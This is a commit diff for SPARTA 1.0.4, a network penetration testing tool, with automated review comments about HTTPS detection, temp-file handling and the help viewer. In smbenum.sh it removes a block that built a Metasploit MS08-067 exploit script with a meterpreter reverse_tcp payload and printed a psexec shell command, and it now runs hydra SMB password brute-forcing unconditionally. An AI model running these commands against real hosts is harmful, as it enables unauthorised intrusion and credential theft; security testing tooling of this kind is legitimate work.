Removed QtWebKit dependency (closes #94). Improved HTTPS/HTTP detection (closes #90). Removed check for ms08-067 from smbenum.sh root 5 years ago
6 changed file(s) with 43 addition(s) and 109 deletion(s).
1919
2020 SPARTA 1.0.3 (BETA)
2121 * fixed the QtWebKit import error (thx alexxn)
22 * fixed ms08-067_check import issue (thx chris948)
22 * fixed ms08-067_check import issue (thx chris948)
23
24 SPARTA 1.0.4 (BETA)
25 * removed QtWebKit dependency for displaying the help menu
26 * improved HTTPS/HTTP detection (experimental)
27 * removed MS08-067 check from smbenum.sh
11
22 '''
33 SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4 Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis)
4 Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
55
66 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
77
1010 You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
1111 '''
1212
13 import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re # for webrequests, screenshot timeouts, timestamps, browser stuff and regex
13 import os, sys, urllib2, socket, time, datetime, locale, webbrowser, re, requests # for webrequests, screenshot timeouts, timestamps, browser stuff and regex
1414 from PyQt4 import QtGui, QtCore
1515 from PyQt4.QtCore import * # for QProcess
16 import errno # temporary for isHttpd
16 #import errno # temporary for isHttpd
1717 import subprocess # for screenshots with cutycapt
1818 import string # for input validation
1919
3838 res = (16777216 * o[0]) + (65536 * o[1]) + (256 * o[2]) + o[3]
3939 return res
4040
41 # old function, replaced by isHttps (checking for https first is better)
42 def isHttp(url):
41 # checks if a web port is SSL enabled
42 def isHttps(ip, port):
43 headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0'}
4344 try:
44 req = urllib2.Request(url)
45 req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0')
46 r = urllib2.urlopen(req, timeout=10)
47 #print 'response code: ' + str(r.code)
48 #print 'response content: ' + str(r.read())
49 return True
50
51 except urllib2.HTTPError, e:
52 reason = str(sys.exc_info()[1].reason)
53 # print reason
54 if reason == 'Unauthorized' or reason == 'Forbidden':
55 return True
45 r = requests.get("https://"+ip+":"+port, headers=headers, verify=False, timeout=5)
46 return True
47
48 except requests.exceptions.SSLError as e:
5649 return False
57
58 except:
50
51 except requests.exceptions.ConnectionError as e:
52 return False
53
54 except requests.exceptions.ReadTimeout as e:
5955 return False
60
61 def isHttps(ip, port):
62 try:
63 req = urllib2.Request('https://'+ip+':'+port)
64 req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0')
65 r = urllib2.urlopen(req, timeout=5)
66 # print '\nresponse code: ' + str(r.code)
67 # print '\nresponse content: ' + str(r.read())
68 return True
69
70 except:
71 reason = str(sys.exc_info()[1].reason)
72 # print reason
73 # if 'Interrupted system call' in reason:
74 # print 'caught exception. retry?'
75
76 if reason == 'Forbidden':
77 return True
78 return False
79
80
56
57 except Exception as e:
58 print e
59 return True
60
8161 def getTimestamp(human=False):
8262 t = time.time()
8363 if human:
276256 else:
277257 self.save("http://"+url, ip, port, outputfile)
278258
279 except:
259 except Exception as e:
280260 print '\t[-] Unable to take the screenshot. Moving on..'
261 print e
281262 continue
282263
283264 self.processing = False
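Review bot: In the rewritten isHttps, the final `except Exception as e:` handler prints the error and returns True, so any failure not covered by the three specific handlers is reported as an HTTPS service; unless that fallback is intended, `return False` there keeps the classification conservative. The probe also follows redirects by default, so a redirect from the HTTPS port to a host that cannot be reached raises ConnectionError and the port is classified as non-SSL; passing `allow_redirects=False` to `requests.get` keeps the answer tied to the probed port. `verify=False` is reasonable for a pure TLS-detection probe, but it deserves a comment such as `# verify=False: only checking that the port speaks TLS, the certificate is not trusted`.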
2121
2222 # initialisations that will happen once - when the program is launched
2323 def __init__(self, view, logic):
24 self.version = 'SPARTA 1.0.3 (BETA)' # update this everytime you commit!
24 self.version = 'SPARTA 1.0.4 (BETA)' # update this everytime you commit!
2525 self.logic = logic
2626 self.view = view
2727 self.view.setController(self)
4343 echo -e "\n########## Enumerating shares ##########"
4444 nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP
4545
46 #echo -e "\n########## Checking for common vulnerabilities ##########"
47 #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns $IP
48 #nmap -Pn -T4 -sS -p139,445 --script=smb-check-vulns --script-args=unsafe=1 $IP
49 #echo -e "\nChecking for MS08-067 with metasploit. It could take a while.."
50 #vulnerable=`msfcli exploits/windows/smb/ms08_067_netapi RHOST=$IP C`
51 echo -e "\nChecking for MS08-067.."
52 vulnerable=`python ./scripts/ms08-067_check.py -t $IP -s`
53 echo $vulnerable
46 echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
47 hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
48 rm /tmp/$IP-users.txt
5449
55 #if [[ $vulnerable == *"The target is vulnerable"* ]]
56 if [[ $vulnerable == *"VULNERABLE"* ]]
57 then
58 echo "Oh yeah! The target is vulnerable!"
59 MYIP=$(ifconfig $IFACE | awk -F'[: ]+' '/inet addr:/ {print $4}')
60 echo "use exploits/windows/smb/ms08_067_netapi" > /tmp/$IP-netapi.rc
61 echo "set payload windows/meterpreter/reverse_tcp" >> /tmp/$IP-netapi.rc
62 echo "set RHOST $IP" >> /tmp/$IP-netapi.rc
63 echo "set LHOST $MYIP" >> /tmp/$IP-netapi.rc
64 echo "set LPORT 443" >> /tmp/$IP-netapi.rc
65 echo "set ExitOnSession false" >> /tmp/$IP-netapi.rc
66 echo "exploit -j" >> /tmp/$IP-netapi.rc
67
68 echo -e "\nTo exploit this host now use:"
69 echo -e "msfconsole -r /tmp/$IP-netapi.rc"
70 else
71 echo "The target is NOT vulnerable!"
72 echo -e "\n########## Bruteforcing all users with 'password', blank and username as password"
73 hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1
74 rm /tmp/$IP-users.txt
75
76 echo -e "\n\nTo get a shell use:"
77 echo -e "/usr/local/bin/psexec.py <user>:<password>@$IP cmd.exe\n"
78 fi
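Review bot: The hydra step that this change makes unconditional still reads and then removes `/tmp/$IP-users.txt`, a predictable name in a world-writable directory, and expands `$IP` unquoted. On a shared host another local user could pre-create or symlink that path, and an argument containing spaces or glob characters would be split by the shell. The file is written outside the visible lines, so the fix belongs there as well: create it with `USERS=$(mktemp)` and use `"$USERS"` and `"$IP"` in the `hydra` and `rm` lines.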
11
22 '''
33 SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4 Copyright (c) 2018 SECFORCE (Antonio Quina and Leonidas Stavliotis)
4 Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
55
66 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
77
2525 print e
2626 exit(1)
2727
28 try:
29 from PyQt4 import QtWebKit
30 except ImportError, e:
31 try:
32 from PySide import QtWebKit
33 except ImportError:
34 print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit"
35 exit(1)
36
3728 from app.logic import *
3829 from ui.gui import *
3930 from ui.view import *
11
22 '''
33 SPARTA - Network Infrastructure Penetration Testing Tool (http://sparta.secforce.com)
4 Copyright (c) 2015 SECFORCE (Antonio Quina and Leonidas Stavliotis)
4 Copyright (c) 2019 SECFORCE (Antonio Quina and Leonidas Stavliotis)
55
66 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
77
1616 from PyQt4.QtCore import * # for filters dialog
1717 except ImportError:
1818 print "[-] Import failed. PyQt4 library not found. \nTry installing it with: apt install python-qt4"
19
20 try:
21 usePySide = False
22 from PyQt4 import QtWebKit
23 except ImportError, e:
24 try:
25 from PySide import QtWebKit
26 usePySide = True
27 except ImportError, e:
28 print "[-] Import failed. QtWebKit library not found. \nTry installing it with: apt install python-pyside.qtwebkit"
29 exit(1)
3019
3120 from ui.gui import *
3221 from ui.dialogs import *
3726 from app.processmodels import *
3827 from app.auxiliary import *
3928 import time #temp
29 import webbrowser # to open help page in browser
4030
4131 # this class handles everything gui-related
4232 class View(QtCore.QObject):
6252 self.importProgressWidget = ProgressWidget('Importing nmap..', self.ui.centralwidget)
6353 self.adddialog = AddHostsDialog(self.ui.centralwidget)
6454 self.settingsWidget = AddSettingsDialog(self.ui.centralwidget)
65 self.helpWidget = QtWebKit.QWebView()
66 self.helpWidget.setWindowTitle('SPARTA Help')
6755
6856 # kali moves the help file so let's find it
69 url = './doc/help.html'
70 if not os.path.exists(url):
71 url = '/usr/share/doc/sparta/help.html'
72
73 if usePySide:
74 self.helpWidget.load(url)
75 else:
76 self.helpWidget.load(QUrl(url))
77
57 self.helpurl = './doc/help.html'
58 if not os.path.exists(self.helpurl):
59 self.helpurl = '/usr/share/doc/sparta/help.html'
60
7861 self.ui.HostsTableView.setSelectionMode(1) # disable multiple selection
7962 self.ui.ServiceNamesTableView.setSelectionMode(1)
8063 self.ui.ToolsTableView.setSelectionMode(1)
449432 self.controller.cancelSettings()
450433
451434 def connectHelp(self):
452 self.ui.menuHelp.triggered.connect(self.helpWidget.show)
435 self.ui.menuHelp.triggered.connect(self.showHelp)
436
437 def showHelp(self):
438 webbrowser.open(self.helpurl)
453439
454440 ###
455441
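Review bot: `webbrowser.open(self.helpurl)` in the new showHelp receives the relative path `./doc/help.html` whenever that file exists, so what the browser opens depends on the process's working directory and on how the browser treats a bare relative path. Resolving it once where it is assigned, `self.helpurl = 'file://' + os.path.abspath('./doc/help.html')`, makes the target unambiguous. The return value of `webbrowser.open` is ignored, so a missing browser or a missing help file fails silently; checking it and printing a message would help. If SPARTA is started with root privileges, which is not visible here, the browser is launched with them too, which is worth a comment on showHelp. The assignment sits in a method whose start is outside the hunk.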